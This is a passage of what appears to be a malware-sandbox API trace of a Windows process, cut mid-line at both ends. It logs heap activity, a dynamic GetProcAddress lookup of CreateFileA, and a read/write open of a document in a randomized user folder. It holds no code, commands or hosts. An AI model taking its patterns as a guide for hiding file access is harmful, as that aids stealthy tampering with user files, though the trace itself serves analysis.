hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.813] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fe8 [0177.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0177.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.814] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0177.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0177.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0177.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.815] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0177.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0177.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0177.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpUsedDefaultChar=0x0) returned 65 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.816] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\g856.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x8feba8 [0177.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x8feba8, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots") returned 65 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.819] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.821] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0177.821] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 